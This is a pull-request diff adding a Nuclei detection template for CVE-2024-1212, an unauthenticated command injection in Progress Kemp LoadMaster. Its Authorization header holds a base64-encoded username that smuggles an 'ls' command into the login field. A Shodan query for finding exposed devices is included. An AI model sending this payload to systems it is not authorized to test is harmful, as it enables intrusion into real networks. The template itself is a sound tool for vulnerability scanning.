Merge pull request #9383 from projectdiscovery/CVE-2024-1212
Create CVE-2024-1212.yaml (Progress Kemp LoadMaster - Unauthenticated Command Injection) 🔥
patch-1
commit
1243442842
|
@ -0,0 +1,46 @@
|
|||
id: CVE-2024-1212
|
||||
|
||||
info:
|
||||
name: Progress Kemp LoadMaster - Command Injection
|
||||
author: DhiyaneshDK
|
||||
severity: critical
|
||||
description: |
|
||||
Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.
|
||||
reference:
|
||||
- https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster
|
||||
- https://support.kemptechnologies.com/hc/en-us/articles/23878931058445-LoadMaster-Security-Vulnerability-CVE-2024-1212
|
||||
- https://support.kemptechnologies.com/hc/en-us/articles/24325072850573-Release-Notice-LMOS-7-2-59-2-7-2-54-8-7-2-48-10-CVE-2024-1212
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2024-1212
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10
|
||||
cve-id: CVE-2024-1212
|
||||
cwe-id: CWE-78
|
||||
epss-score: 0.00046
|
||||
epss-percentile: 0.13478
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
shodan-query: html:"LoadMaster"
|
||||
tags: cve,cve2024,progress,rce,loadmaster
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/access/set?param=enableapi&value=1"
|
||||
headers:
|
||||
Authorization: "Basic JztsczsnOmRvZXNub3RtYXR0ZXI="
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "bin"
|
||||
- "mnt"
|
||||
- "WWW-Authenticate: Basic"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue